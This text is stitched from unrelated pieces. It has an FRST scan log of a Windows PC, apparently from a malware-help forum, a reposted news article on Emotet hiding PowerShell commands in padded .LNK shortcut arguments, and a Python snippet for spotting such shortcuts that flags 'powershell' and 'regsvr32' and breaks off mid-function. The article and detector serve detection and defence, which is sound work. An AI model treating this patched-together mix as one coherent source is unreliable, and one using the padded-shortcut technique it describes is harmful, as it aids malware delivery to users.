2022-04-26 18:31 - 2022-04-26 19:50 - 000003846 _____ C:WINDOWSsystem32TasksBitdefender Agent WatchDog_65D6944A0EF74FDAB96E31112AD39864
2022-04-26 18:31 - 2022-04-26 18:31 - 000003634 _____ C:WINDOWSsystem32TasksOpera scheduled Autoupdate 1642631694
2022-04-26 18:31 - 2022-04-26 18:31 - 000003580 _____ C:WINDOWSsystem32TasksBraveSoftwareUpdateTaskMachineUA
2022-04-26 18:31 - 2022-04-26 18:31 - 000003408 _____ C:WINDOWSsystem32TasksMicrosoftEdgeUpdateTaskMachineUA
2022-04-26 18:31 - 2022-04-26 18:31 - 000003356 _____ C:WINDOWSsystem32TasksBraveSoftwareUpdateTaskMachineCore
2022-04-26 18:31 - 2022-04-26 18:31 - 000003348 _____ C:WINDOWSsystem32TasksGoogleUpdateTaskMachineUA
2022-04-26 18:31 - 2022-04-26 18:31 - 000003214 _____ C:WINDOWSsystem32TasksMicrosoftEdgeUpdateTaskMachineCore1d83e245fa71e18
2022-04-26 18:31 - 2022-04-26 18:31 - 000003194 _____ C:WINDOWSsystem32TasksCCleaner Update
2022-04-26 18:31 - 2022-04-26 18:31 - 000003184 _____ C:WINDOWSsystem32TasksMicrosoftEdgeUpdateTaskMachineCore
2022-04-26 18:31 - 2022-04-26 18:31 - 000003124 _____ C:WINDOWSsystem32TasksGoogleUpdateTaskMachineCore
2022-04-26 18:31 - 2022-04-26 18:31 - 000003066 _____ C:WINDOWSsystem32TasksOneDrive Reporting Task-S-1-5-21-1599435516-3482468045-2126034812-1002
2022-04-26 18:31 - 2022-04-26 18:31 - 000002862 _____ C:WINDOWSsystem32TasksOneDrive Standalone Update Task-S-1-5-21-1599435516-3482468045-2126034812-1002
2022-04-26 18:31 - 2022-04-26 18:31 - 000002862 _____ C:WINDOWSsystem32TasksOneDrive Standalone Update Task-S-1-5-21-1599435516-3482468045-2126034812-1001
2022-04-26 18:31 - 2022-04-26 18:31 - 000002748 _____ C:WINDOWSsystem32TasksSystemOptimizer

==================== One month (modified) ==================

(If an entry is included in the fixlist, the file/folder will be moved.)

2022-04-28 19:18 - 2022-01-19 22:28 - 000000000 ____D C:UsersPhenomAppDataRoamingqBittorrent
2022-04-28 18:43 - 2021-06-05 15:10 - 000000000 ____D C:ProgramDataregid.1991-06.com.microsoft
2022-04-28 18:29 - 2021-06-05 15:09 - 000000000 ____D C:WINDOWSINF
2022-04-28 18:27 - 2021-06-05 15:01 - 000065536 _____ C:WINDOWSsystem32configELAM
2022-04-28 18:25 - 2022-01-19 22:02 - 000000000 ____D C:Program Files (x86)Google
2022-04-28 18:23 - 2022-01-19 22:30 - 000000000 ____D C:ProgramDataNVIDIA
2022-04-28 18:23 - 2022-01-19 22:28 - 000000000 ____D C:UsersPhenomAppDataRoamingSamsung Magician
2022-04-28 18:23 - 2022-01-19 21:59 - 000000000 ____D C:UsersPhenomAppDataLocalD3DSCache
2022-04-28 18:23 - 2021-06-05 15:10 - 000000000 ____D C:WINDOWSSystemTemp
2022-04-28 18:22 - 2021-12-23 16:17 - 000012288 ___SH C:DumpStack.log.tmp
2022-04-28 18:22 - 2021-06-05 15:01 - 000524288 _____ C:WINDOWSsystem32configBBI
2022-04-28 14:55 - 2022-01-19 22:27 - 000000000 ____D C:UsersPhenomAppDataLocalSquirrelTemp
2022-04-28 03:45 - 2022-01-19 22:28 - 000000000 ____D C:UsersPhenomAppDataRoamingvlc
2022-04-28 03:05 - 2021-06-05 15:10 - 000000000 ____D C:WINDOWSappcompat
2022-04-28 01:44 - 2022-01-19 21:59 - 000000000 ____D C:UsersPhenomAppDataLocalPackages
2022-04-28 01:19 - 2022-01-20 01:17 - 000000713 _____ C:WINDOWSsystem32Driversetchosts.ics
2022-04-28 01:15 - 2021-06-05 15:10 - 000000000 ___HD C:Program FilesWindowsApps
2022-04-28 01:15 - 2021-06-05 15:10 - 000000000 ____D C:WINDOWSAppReadiness
2022-04-27 21:51 - 2022-01-19 22:23 - 000000000 ____D C:UsersPhenomAppDataLocalNVIDIA
2022-04-27 17:19 - 2022-01-19 22:27 - 000000000 ____D C:UsersPhenomAppDataLocalNVIDIA Corporation
2022-04-27 17:18 - 2022-01-19 22:30 - 000001447 _____ C:UsersPublicDesktopGeForce Experience.lnk
2022-04-27 17:18 - 2022-01-19 22:30 - 000000000 ____D C:Program Files (x86)NVIDIA Corporation
2022-04-27 17:18 - 2022-01-19 22:00 - 000000000 ____D C:ProgramDataNVIDIA Corporation
2022-04-27 17:18 - 2022-01-19 22:00 - 000000000 ____D C:Program FilesNVIDIA Corporation
2022-04-27 03:41 - 2021-06-05 17:30 - 000000000 ____D C:Program FilesWindows Photo Viewer
2022-04-27 03:41 - 2021-06-05 17:30 - 000000000 ____D C:Program FilesWindows Defender Advanced Threat Protection
2022-04-27 03:41 - 2021-06-05 17:30 - 000000000 ____D C:Program Files (x86)Windows Photo Viewer
2022-04-27 03:41 - 2021-06-05 15:10 - 000000000 ___SD C:WINDOWSSysWOW64F12
2022-04-27 03:41 - 2021-06-05 15:10 - 000000000 ___SD C:WINDOWSsystem32UNP
2022-04-27 03:41 - 2021-06-05 15:10 - 000000000 ___SD C:WINDOWSsystem32F12
2022-04-27 03:41 - 2021-06-05 15:10 - 000000000 ___SD C:WINDOWSsystem32DiagSvcs
2022-04-27 03:41 - 2021-06-05 15:10 - 000000000 ___RD C:WINDOWSPrintDialog
2022-04-27 03:41 - 2021-06-05 15:10 - 000000000 ___RD C:WINDOWSImmersiveControlPanel
2022-04-27 03:41 - 2021-06-05 15:10 - 000000000 ____D C:WINDOWSSysWOW64setup
2022-04-27 03:41 - 2021-06-05 15:10 - 000000000 ____D C:WINDOWSSysWOW64Dism
2022-04-27 03:41 - 2021-06-05 15:10 - 000000000 ____D C:WINDOWSSysWOW64Com
2022-04-27 03:41 - 2021-06-05 15:10 - 000000000 ____D C:WINDOWSSystemResources
2022-04-27 03:41 - 2021-06-05 15:10 - 000000000 ____D C:WINDOWSsystem32WinBioPlugIns
2022-04-27 03:41 - 2021-06-05 15:10 - 000000000 ____D C:WINDOWSsystem32SystemResetPlatform
2022-04-27 03:41 - 2021-06-05 15:10 - 000000000 ____D C:WINDOWSsystem32Sysprep
2022-04-27 03:41 - 2021-06-05 15:10 - 000000000 ____D C:WINDOWSsystem32setup
2022-04-27 03:41 - 2021-06-05 15:10 - 000000000 ____D C:WINDOWSsystem32oobe
2022-04-27 03:41 - 2021-06-05 15:10 - 000000000 ____D C:WINDOWSsystem32Dism
2022-04-27 03:41 - 2021-06-05 15:10 - 000000000 ____D C:WINDOWSsystem32Com
2022-04-27 03:41 - 2021-06-05 15:10 - 000000000 ____D C:WINDOWSsystem32appraiser
2022-04-27 03:41 - 2021-06-05 15:10 - 000000000 ____D C:WINDOWSPolicyDefinitions
2022-04-27 03:41 - 2021-06-05 15:10 - 000000000 ____D C:WINDOWSIME
2022-04-27 03:41 - 2021-06-05 15:10 - 000000000 ____D C:WINDOWSbcastdvr
2022-04-27 03:41 - 2021-06-05 15:10 - 000000000 ____D C:Program FilesWindows Defender
2022-04-27 03:41 - 2021-06-05 15:10 - 000000000 ____D C:Program FilesCommon FilesSystem
2022-04-27 03:41 - 2021-06-05 15:01 - 000000000 ____D C:WINDOWSservicing
2022-04-27 00:34 - 2022-01-19 22:26 - 000000000 ____D C:UsersPhenomAppDataLocalCrashDumps
2022-04-27 00:18 - 2022-01-19 22:17 - 000000000 ____D C:UsersPhenomDownloadsTelegram Desktop
2022-04-26 23:57 - 2022-02-11 01:51 - 000000000 ____D C:WSA
2022-04-26 23:06 - 2021-06-05 15:01 - 000000000 ____D C:WINDOWSCbsTemp
2022-04-26 23:04 - 2021-06-05 15:08 - 000245760 _____ (Microsoft Corporation) C:WINDOWSsystem32msclmd.dll
2022-04-26 23:04 - 2021-06-05 15:08 - 000207360 _____ (Microsoft Corporation) C:WINDOWSSysWOW64msclmd.dll
2022-04-26 20:24 - 2021-06-05 15:10 - 000000000 ____D C:WINDOWSsystem32NDF
2022-04-26 19:58 - 2022-01-19 22:31 - 000000000 ____D C:UsersPhenomAppDataRoamingMicrosoftWindowsStart MenuProgramsDiscord Inc
2022-04-26 19:48 - 2022-01-19 21:59 - 000000000 __RHD C:UsersPublicAccountPictures
2022-04-26 18:28 - 2021-06-05 15:10 - 000000000 ____D C:WINDOWSMedia
2022-04-26 18:27 - 2022-03-28 22:59 - 000000000 ____D C:Program FilesCommon Fileslogishrd
2022-04-26 18:27 - 2022-03-25 03:50 - 000000000 ____D C:ProgramDataMicrosoftWindowsStart MenuProgramsqBittorrent
2022-04-26 18:27 - 2022-03-25 02:45 - 000000000 ____D C:ProgramDataMicrosoftWindowsStart MenuProgramsHWiNFO64
2022-04-26 18:27 - 2022-03-22 23:53 - 000000000 ____D C:ProgramDataMicrosoftWindowsStart MenuProgramsDriversCloud.com
2022-04-26 18:27 - 2022-02-26 17:49 - 000000000 ____D C:ProgramDataMicrosoftWindowsStart MenuProgramsJava
2022-04-26 18:27 - 2022-02-24 16:03 - 000000000 ____D C:UsersPhenomAppDataRoamingMicrosoftWindowsStart MenuProgramsWinRAR
2022-04-26 18:27 - 2022-02-24 16:03 - 000000000 ____D C:ProgramDataMicrosoftWindowsStart MenuProgramsWinRAR
2022-04-26 18:27 - 2022-02-19 03:56 - 000000000 ____D C:ProgramDataMicrosoftWindowsStart MenuProgramsmLogcat
2022-04-26 18:27 - 2022-02-16 03:09 - 000000000 ____D C:ProgramDataMicrosoftWindowsStart MenuProgramsCheat Engine 7.4
2022-04-26 18:27 - 2022-02-10 03:27 - 000000000 ____D C:ProgramDataMicrosoftWindowsStart MenuProgramsTextCrawler Pro
2022-04-26 18:27 - 2022-02-08 18:51 - 000000000 ____D C:ProgramDataMicrosoftWindowsStart MenuProgramsNode.js
2022-04-26 18:27 - 2022-01-31 16:57 - 000000000 ____D C:ProgramDataMicrosoftWindowsStart MenuProgramsGit
2022-04-26 18:27 - 2022-01-31 16:56 - 000000000 ____D C:UsersPhenomAppDataRoamingMicrosoftWindowsStart MenuProgramsGitHub, Inc
2022-04-26 18:27 - 2022-01-22 23:53 - 000000000 ____D C:ProgramDataMicrosoftWindowsStart MenuProgramsOBS Studio
2022-04-26 18:27 - 2022-01-19 23:00 - 000000000 ____D C:ProgramDataMicrosoftWindowsStart MenuProgramsRiot Games
2022-04-26 18:27 - 2022-01-19 22:30 - 000000000 ____D C:ProgramDataMicrosoftWindowsStart MenuProgramsNVIDIA Corporation
2022-04-26 18:27 - 2022-01-19 22:13 - 000000000 ____D C:UsersPhenomAppDataRoamingMicrosoftWindowsStart MenuProgramsAplicații Chrome Beta
2022-04-26 18:27 - 2022-01-19 22:03 - 000000000 ____D C:UsersPhenomAppDataRoamingMicrosoftWindowsStart MenuProgramsTotal Commander
2022-04-26 18:27 - 2022-01-19 21:59 - 000000000 ____D C:WINDOWSsystem32DriversNVIDIA Corporation
2022-04-26 18:27 - 2021-06-05 15:10 - 000000000 ___HD C:WINDOWSsystem32GroupPolicy
2022-04-26 18:27 - 2021-06-05 15:10 - 000000000 ____D C:WINDOWSSysWOW64GroupPolicy
2022-04-26 18:27 - 2021-06-05 15:10 - 000000000 ____D C:WINDOWSsystem32WinBioDatabase
2022-04-26 18:27 - 2021-06-05 15:10 - 000000000 ____D C:WINDOWSsystem32Tasks_Migrated
2022-04-26 18:27 - 2021-06-05 15:10 - 000000000 ____D C:WINDOWSsystem32spool
2022-04-26 18:27 - 2021-06-05 15:10 - 000000000 ____D C:WINDOWSsystem32MsDtc
2022-04-26 18:27 - 2021-06-05 15:10 - 000000000 ____D C:WINDOWSServiceState
2022-04-26 18:27 - 2021-06-05 15:10 - 000000000 ____D C:WINDOWSLiveKernelReports
2022-04-26 18:27 - 2021-06-05 15:10 - 000000000 ____D C:Program FilesCommon Filesmicrosoft shared
2022-04-26 18:27 - 2021-06-05 15:08 - 000028672 _____ C:WINDOWSsystem32configBCD-Template
2022-04-26 18:24 - 2021-06-05 15:14 - 000000000 ____D C:WINDOWSSetup
2022-04-26 18:21 - 2021-06-05 15:10 - 000000000 ____D C:ProgramDataUSOPrivate
2022-04-26 18:07 - 2022-03-25 03:08 - 000000000 ____D C:ProgramDataMicrosoftWindowsStart MenuProgramsFinalWire
2022-04-26 18:07 - 2022-03-24 17:28 - 000000000 ____D C:ProgramDataMicrosoftWindowsStart MenuProgramsCPUID
2022-04-26 18:07 - 2022-02-17 22:56 - 000000000 ____D C:ProgramDataMicrosoftWindowsStart MenuProgramsStreamlabs
2022-04-26 18:05 - 2022-01-24 17:05 - 000000000 ____D C:UsersUserAppDataLocalPackages
2022-04-26 17:59 - 2021-06-05 15:21 - 000049464 _____ (Microsoft Corporation) C:WINDOWSsystem32UtilityVmSysprep.dll
2022-04-26 17:59 - 2021-06-05 15:19 - 000504144 _____ (Microsoft Corporation) C:WINDOWSsystem32NetMgmtIF.dll
2022-04-26 17:59 - 2021-06-05 15:19 - 000213328 _____ C:WINDOWSsystem32IsolatedWindowsEnvironmentUtils.dll
2022-04-26 17:59 - 2021-06-05 15:19 - 000192848 _____ C:WINDOWSsystem32HvsiSettingsWorker.exe
2022-04-26 17:59 - 2021-06-05 15:19 - 000139600 _____ C:WINDOWSsystem32nmscrub.exe
2022-04-26 17:59 - 2021-06-05 15:19 - 000119120 _____ (Microsoft Corporation) C:WINDOWSsystem32nmbind.exe
2022-04-26 17:59 - 2021-06-05 15:19 - 000114688 _____ C:WINDOWSsystem32hvsiproxyapp.exe
2022-04-26 17:59 - 2021-06-05 15:19 - 000094536 _____ (Microsoft Corporation) C:WINDOWSsystem32CmAgent.dll
2022-04-26 17:59 - 2021-06-05 15:19 - 000082256 _____ C:WINDOWSsystem32HvsiMachinePolicies.dll
2022-04-26 17:59 - 2021-06-05 15:19 - 000082248 _____ (Microsoft Corporation) C:WINDOWSsystem32Driversl2bridge.sys
2022-04-26 17:59 - 2021-06-05 15:19 - 000081920 _____ (Microsoft Corporation) C:WINDOWSsystem32CCGLaunchPad.dll
2022-04-26 17:59 - 2021-06-05 15:19 - 000069944 _____ C:WINDOWSsystem32AuditSettingsProvider.dll
2022-04-26 17:59 - 2021-06-05 15:19 - 000049488 _____ (Microsoft Corporation) C:WINDOWSsystem32Drivershnswfpdriver.sys
2022-04-26 17:59 - 2021-06-05 15:18 - 000401736 _____ (Microsoft Corporation) C:WINDOWSsystem32VmSynthNic.dll
2022-04-26 17:59 - 2021-06-05 15:18 - 000360784 _____ (Microsoft Corporation) C:WINDOWSsystem32vmiccore.dll
2022-04-26 17:59 - 2021-06-05 15:18 - 000356680 _____ (Microsoft Corporation) C:WINDOWSsystem32hcsdiag.exe
2022-04-26 17:59 - 2021-06-05 15:18 - 000311616 _____ (Microsoft Corporation) C:WINDOWSsystem32vmflexio.dll
2022-04-26 17:59 - 2021-06-05 15:18 - 000270672 _____ (Microsoft Corporation) C:WINDOWSsystem32CExecSvc.exe
2022-04-26 17:59 - 2021-06-05 15:18 - 000258384 _____ (Microsoft Corporation) C:WINDOWSsystem32vmbusvdev.dll
2022-04-26 17:59 - 2021-06-05 15:18 - 000250184 _____ (Microsoft Corporation) C:WINDOWSsystem32gpupvdev.dll
2022-04-26 17:59 - 2021-06-05 15:18 - 000233808 _____ (Microsoft Corporation) C:WINDOWSsystem32Driversvpcivsp.sys
2022-04-26 17:59 - 2021-06-05 15:18 - 000164176 _____ (Microsoft Corporation) C:WINDOWSsystem32vmvirtio.dll
2022-04-26 17:59 - 2021-06-05 15:18 - 000123208 _____ (Microsoft Corporation) C:WINDOWSsystem32vmwpevents.dll
2022-04-26 17:59 - 2021-06-05 15:18 - 000122880 _____ C:WINDOWSsystem32vmhbmgmt.dll
2022-04-26 17:59 - 2021-06-05 15:18 - 000119104 _____ (Microsoft Corporation) C:WINDOWSsystem32vmwpctrl.dll
2022-04-26 17:59 - 2021-06-05 15:18 - 000110904 _____ (Microsoft Corporation) C:WINDOWSsystem32wcsetupagent.exe
2022-04-26 17:59 - 2021-06-05 15:18 - 000090112 _____ C:WINDOWSsystem32Driversvmbusproxy.sys
2022-04-26 17:59 - 2021-06-05 15:18 - 000078144 _____ (Microsoft Corporation) C:WINDOWSsystem32Driversvhdparser.sys
2022-04-26 17:59 - 2021-06-05 15:18 - 000069968 _____ (Microsoft Corporation) C:WINDOWSsystem32Driverspassthruparser.sys
2022-04-26 17:59 - 2021-06-05 15:18 - 000069960 _____ (Microsoft Corporation) C:WINDOWSsystem32Driversvkrnlintvsc.sys
2022-04-26 17:59 - 2021-06-05 15:18 - 000069952 _____ (Microsoft Corporation) C:WINDOWSsystem32Driversvkrnlintvsp.sys
2022-04-26 17:59 - 2021-06-05 15:18 - 000061776 _____ (Microsoft Corporation) C:WINDOWSsystem32Drivershvsocketcontrol.sys
2022-04-26 17:59 - 2021-06-05 15:18 - 000049480 _____ (Microsoft Corporation) C:WINDOWSsystem32VrdUmed.dll
2022-04-26 17:59 - 2021-06-05 15:18 - 000049464 _____ (Microsoft Corporation) C:WINDOWSsystem32vmsifproxystub.dll
2022-04-26 17:59 - 2021-06-05 15:18 - 000041288 _____ (Microsoft Corporation) C:WINDOWSsystem32vmcomputeeventlog.dll
2022-04-26 17:59 - 2021-06-05 15:18 - 000036864 _____ (Microsoft Corporation) C:WINDOWSsystem32VmComputeProxy.dll
2022-04-26 17:59 - 2021-06-05 15:18 - 000024904 _____ (Microsoft Corporation) C:WINDOWSsystem32f989b52d-f928-44a3-9bf1-bf0c1da6a0d6_HyperV-DeviceVirtualization.dll
2022-04-26 17:59 - 2021-06-05 15:18 - 000024904 _____ (Microsoft Corporation) C:WINDOWSsystem32f1db7d81-95be-4911-935a-8ab71629112a_HyperV-IsolatedVM.dll
2022-04-26 17:59 - 2021-06-05 15:18 - 000024904 _____ (Microsoft Corporation) C:WINDOWSsystem32c4d66f00-b6f0-4439-ac9b-c5ea13fe54d7_HyperV-ComputeCore.dll
2022-04-26 17:59 - 2021-06-05 15:18 - 000024904 _____ (Microsoft Corporation) C:WINDOWSsystem32c28c7a4e-a619-4463-82b7-0fc9cc7187f5_HyperV-ComputeStorage.dll
2022-04-26 17:59 - 2021-06-05 15:18 - 000024896 _____ (Microsoft Corporation) C:WINDOWSsystem32d4d78066-e6db-44b7-b5cd-2eb82dce620c_HyperV-ComputeLegacy.dll
2022-04-26 17:59 - 2021-06-05 15:18 - 000006658 _____ C:WINDOWSsystem32VmFirmware Third-Party Notices.txt
2022-04-26 14:38 - 2022-01-19 21:59 - 000000000 ____D C:ProgramDataPackages
2022-04-26 03:36 - 2022-01-19 22:03 - 000000000 ____D C:Program FilesTotal Commander
2022-04-26 01:51 - 2022-01-20 01:41 - 000000000 ____D C:ProgramDataF-Secure
2022-04-26 01:51 - 2022-01-19 22:26 - 000000000 ____D C:UsersPhenomAppDataLocalF-Secure
2022-04-26 01:35 - 2022-01-20 01:34 - 000001486 _____ C:UsersPhenomAppDataRoamingMicrosoftWindowsStart MenuProgramsOpera developer.lnk
2022-04-26 00:53 - 2022-01-19 23:20 - 000000000 ____D C:Program Files7-Zip
2022-04-25 23:09 - 2022-01-19 22:17 - 000002278 _____ C:UsersPhenomDesktopMicrosoft Edge.lnk
2022-04-25 18:11 - 2022-01-19 22:27 - 000000000 ____D C:UsersPhenomAppDataRoamingobs-studio
2022-04-23 23:34 - 2022-01-19 22:01 - 000000000 ____D C:UsersPhenomAppDataLocalPlaceholderTileLogoFolder
2022-04-23 21:06 - 2022-01-19 22:01 - 000000000 ___RD C:UsersPhenomOneDrive
2022-04-23 12:19 - 2022-01-20 07:52 - 000002440 _____ C:ProgramDataMicrosoftWindowsStart MenuProgramsMicrosoft Edge.lnk
2022-04-23 02:14 - 2021-12-24 02:05 - 000000000 ____D C:TeamViewerPortable
2022-04-22 13:49 - 2022-01-19 22:53 - 143823848 ____C (Microsoft Corporation) C:WINDOWSsystem32MRT.exe
2022-04-22 13:46 - 2022-01-31 03:16 - 000000000 ____D C:Program Files (x86)Mozilla Maintenance Service
2022-04-21 22:20 - 2022-02-16 03:09 - 000000000 ____D C:Program FilesCheat Engine 7.4
2022-04-21 21:29 - 2022-03-24 01:37 - 007618600 _____ (NVIDIA Corporation) C:WINDOWSsystem32nvapi64.dll
2022-04-21 21:29 - 2022-03-24 01:37 - 006465192 _____ (NVIDIA Corporation) C:WINDOWSSysWOW64nvapi.dll
2022-04-21 18:11 - 2022-01-19 22:26 - 000000000 ____D C:UsersPhenomAppDataLocalLowMozilla
2022-04-21 18:07 - 2022-01-31 03:16 - 000000000 ____D C:ProgramDataMozilla-1de4eec8-1241-4177-a864-e594e8d1fb38
2022-04-21 18:06 - 2022-01-31 03:16 - 000001005 _____ C:ProgramDataMicrosoftWindowsStart MenuProgramsFirefox Nightly.lnk
2022-04-20 22:22 - 2022-01-19 22:02 - 000002302 _____ C:ProgramDataMicrosoftWindowsStart MenuProgramsGoogle Chrome Beta.lnk
2022-04-20 22:22 - 2022-01-19 22:02 - 000002261 _____ C:UsersPublicDesktopGoogle Chrome Beta.lnk
2022-04-20 17:21 - 2022-01-20 01:40 - 000005869 _____ C:UsersPhenomDownloadsfsecure_freedome_vpn_2.43.809.zip
2022-04-20 17:21 - 2022-01-19 22:18 - 000004742 _____ C:UsersPhenomDownloadsdrivermax_11.18.0.38.zip
2022-04-20 17:17 - 2022-01-19 22:18 - 000004651 _____ C:UsersPhenomDownloadsdriver_easy_5.6.14.33488.zip
2022-04-20 17:17 - 2022-01-19 22:18 - 000004651 _____ C:UsersPhenomDownloadsdriver_easy_5.6.14.33488 (1).zip
2022-04-20 17:13 - 2022-03-03 02:29 - 000005887 _____ C:UsersPhenomDownloadsfsecure_freedome_vpn_2.45.888 (1).zip
2022-04-20 04:13 - 2022-01-19 22:27 - 000000000 ____D C:UsersPhenomAppDataRoamingGitHub Desktop
2022-04-20 01:15 - 2022-01-19 22:17 - 000000000 ____D C:UsersPhenomDocumentsGitHub
2022-04-19 23:42 - 2022-01-19 22:27 - 000000000 ____D C:UsersPhenomAppDataRoamingNotepad++
2022-04-19 21:37 - 2022-01-31 16:56 - 000000000 ____D C:UsersPhenomAppDataLocalGitHubDesktop
2022-04-19 21:37 - 2022-01-19 22:17 - 000002378 _____ C:UsersPhenomDesktopGitHub Desktop.lnk
2022-04-15 14:19 - 2022-01-19 22:41 - 000000000 ____D C:ProgramDataSamsung
2022-04-13 23:59 - 2022-01-19 22:20 - 000294281 _____ C:UsersPhenomDownloadsSDI_Update.torrent
2022-04-13 18:54 - 2022-01-19 22:53 - 000000000 ____D C:WINDOWSsystem32MRT
2022-04-13 15:16 - 2022-01-19 22:26 - 000000000 ____D C:UsersPhenomAppDataLocalbabl-0.1
2022-04-12 23:13 - 2021-06-05 17:30 - 000000000 ___SD C:WINDOWSsystem32AppV
2022-04-12 23:13 - 2021-06-05 15:10 - 000000000 ___SD C:WINDOWSSysWOW64DiagSvcs
2022-04-12 23:13 - 2021-06-05 15:10 - 000000000 ____D C:WINDOWSSysWOW64WinMetadata
2022-04-12 23:13 - 2021-06-05 15:10 - 000000000 ____D C:WINDOWSSysWOW64vi-VN
2022-04-12 23:13 - 2021-06-05 15:10 - 000000000 ____D C:WINDOWSSysWOW64oobe
2022-04-12 23:13 - 2021-06-05 15:10 - 000000000 ____D C:WINDOWSSysWOW64lv-LV
2022-04-12 23:13 - 2021-06-05 15:10 - 000000000 ____D C:WINDOWSSysWOW64lt-LT
2022-04-12 23:13 - 2021-06-05 15:10 - 000000000 ____D C:WINDOWSSysWOW64id-ID
2022-04-12 23:13 - 2021-06-05 15:10 - 000000000 ____D C:WINDOWSSysWOW64gl-ES
2022-04-12 23:13 - 2021-06-05 15:10 - 000000000 ____D C:WINDOWSSysWOW64eu-ES
2022-04-12 23:13 - 2021-06-05 15:10 - 000000000 ____D C:WINDOWSSysWOW64et-EE
2022-04-12 23:13 - 2021-06-05 15:10 - 000000000 ____D C:WINDOWSSysWOW64es-MX
2022-04-12 23:13 - 2021-06-05 15:10 - 000000000 ____D C:WINDOWSSysWOW64ca-ES
2022-04-12 23:13 - 2021-06-05 15:10 - 000000000 ____D C:WINDOWSsystem32WinMetadata
2022-04-12 23:13 - 2021-06-05 15:10 - 000000000 ____D C:WINDOWSsystem32vi-VN
2022-04-12 23:13 - 2021-06-05 15:10 - 000000000 ____D C:WINDOWSsystem32ShellExperiences
2022-04-12 23:13 - 2021-06-05 15:10 - 000000000 ____D C:WINDOWSsystem32PerceptionSimulation
2022-04-12 23:13 - 2021-06-05 15:10 - 000000000 ____D C:WINDOWSsystem32migwiz
2022-04-12 23:13 - 2021-06-05 15:10 - 000000000 ____D C:WINDOWSsystem32lv-LV
2022-04-12 23:13 - 2021-06-05 15:10 - 000000000 ____D C:WINDOWSsystem32lt-LT
2022-04-12 23:13 - 2021-06-05 15:10 - 000000000 ____D C:WINDOWSsystem32id-ID
2022-04-12 23:13 - 2021-06-05 15:10 - 000000000 ____D C:WINDOWSsystem32gl-ES
2022-04-12 23:13 - 2021-06-05 15:10 - 000000000 ____D C:WINDOWSsystem32eu-ES
2022-04-12 23:13 - 2021-06-05 15:10 - 000000000 ____D C:WINDOWSsystem32et-EE
2022-04-12 23:13 - 2021-06-05 15:10 - 000000000 ____D C:WINDOWSsystem32es-MX
2022-04-12 23:13 - 2021-06-05 15:10 - 000000000 ____D C:WINDOWSsystem32ca-ES
2022-04-12 23:13 - 2021-06-05 15:10 - 000000000 ____D C:WINDOWSShellExperiences
2022-04-12 23:13 - 2021-06-05 15:10 - 000000000 ____D C:WINDOWSShellComponents
2022-04-12 23:13 - 2021-06-05 15:10 - 000000000 ____D C:WINDOWSProvisioning
2022-04-12 23:13 - 2021-06-05 15:10 - 000000000 ____D C:WINDOWSDiagTrack
2022-04-12 23:12 - 2021-06-05 17:30 - 000032768 _____ (Microsoft Corporation) C:WINDOWSsystem32OEMDefaultAssociations.dll
2022-04-12 23:12 - 2021-06-05 17:30 - 000021047 _____ C:WINDOWSsystem32OEMDefaultAssociations.xml
2022-04-12 19:04 - 2022-01-19 22:26 - 000000000 ____D C:UsersPhenomAppDataLocalgtk-2.0
2022-04-11 17:16 - 2022-01-31 20:37 - 000000000 ____D C:UsersPhenomAppDataLocalTeamViewer
2022-04-11 15:17 - 2022-01-31 22:03 - 000000000 __SHD C:UsersPhenomwc
2022-04-10 22:41 - 2022-02-26 17:48 - 000000000 ____D C:Program Files (x86)Twitch Recover
2022-04-10 00:54 - 2022-03-25 02:45 - 000000000 ____D C:Program FilesHWiNFO64
2022-04-09 17:46 - 2022-01-19 22:23 - 000000000 ____D C:ProgramDataPackage Cache
2022-04-09 01:50 - 2022-01-20 00:58 - 000000000 ____D C:Program FilesVideoLAN
2022-04-08 02:37 - 2022-01-20 07:52 - 000000000 ____D C:WINDOWSsystem32Driverswd
2022-04-06 21:52 - 2022-01-19 23:00 - 000000000 ____D C:Program FilesMicrosoft Update Health Tools
2022-04-06 15:17 - 2022-02-05 21:59 - 000000000 ____D C:Emoji
2022-03-31 21:57 - 2022-01-20 01:18 - 000000000 ____D C:UsersPhenom.android
2022-03-30 20:55 - 2022-01-19 22:30 - 002200272 _____ (NVIDIA Corporation) C:WINDOWSSysWOW64nvspcap.dll
2022-03-30 20:54 - 2022-01-19 22:30 - 002859264 _____ (NVIDIA Corporation) C:WINDOWSsystem32nvspcap64.dll
2022-03-30 20:54 - 2022-01-19 22:30 - 001295104 _____ (NVIDIA Corporation) C:WINDOWSsystem32NvRtmpStreamer64.dll

==================== Files in the root of some directories ========

2022-04-16 18:39 - 2022-04-22 16:56 - 000000149 _____ () C:UsersPubliclog.dat

==================== SigCheck ============================

(There is no automatic fix for files that do not pass verification.)

==================== End of FRST.txt ========================

Edited by buddy215, today, 1:12 p.m.

Emotet malware now installs via PowerShell in Windows shortcut files
https://garagebandforwindowspc.org/emotet-malware-now-installs-via-powershell-in-windows-shortcut-files/
Tue, 26 Apr 2022 21:17:24 +0000

The Emotet botnet now uses Windows shortcut files (.LNK) containing PowerShell commands to infect victim computers, moving away from Microsoft Office macros, which are now disabled by default.

The use of .LNK files is nothing new, as the Emotet gang previously used them in combination with Visual Basic Script (VBS) code to create a command that downloads the payload. However, this is the first time they have used Windows shortcuts to directly execute PowerShell commands.

New technique after a botched campaign

Last Friday, Emotet operators put an end to a phishing campaign because they botched their installer after using a static filename to reference the malicious .LNK shortcut.

Launching the shortcut would trigger a command that extracted a string of VBS code and added it to a VBS file to run.

However, since the distributed shortcut files had a different name than the static one the command was looking for, creating the VBS file would fail. The gang fixed the problem yesterday.

Today, security researchers noticed that Emotet has moved to a new technique that uses PowerShell commands attached to the LNK file to download and run a script on the infected computer.

The malicious string added to the .LNK file is masked and padded with null values (blank space) so that it does not display in the target field (the file the shortcut points to) of the properties dialog of the file.

[Figure: Emotet using PowerShell in LNK files. Source: BleepingComputer]
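
The following added example, which is not from the article, reads the argument string straight from the .LNK file instead of the properties dialog and flags the padding described above. The 260-character display limit, the 32-character padding threshold and the function names are assumptions of this example, and the sample shortcut bytes are constructed.

```python
import re
import struct

# LinkFlags bits from the shell link (.LNK) header
HAS_ID_LIST, HAS_LINK_INFO, HAS_NAME = 0x01, 0x02, 0x04
HAS_REL_PATH, HAS_WORK_DIR, HAS_ARGS, IS_UNICODE = 0x08, 0x10, 0x20, 0x80
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
PAD_RUN = re.compile(r"[\s\x00]{32,}")        # assumed threshold: 32+ blanks/NULs
KEYWORDS = ("powershell", "regsvr32")         # tools named in the article


def lnk_arguments(data: bytes) -> str:
    """Return the COMMAND_LINE_ARGUMENTS string of a shell link ('' if none)."""
    try:
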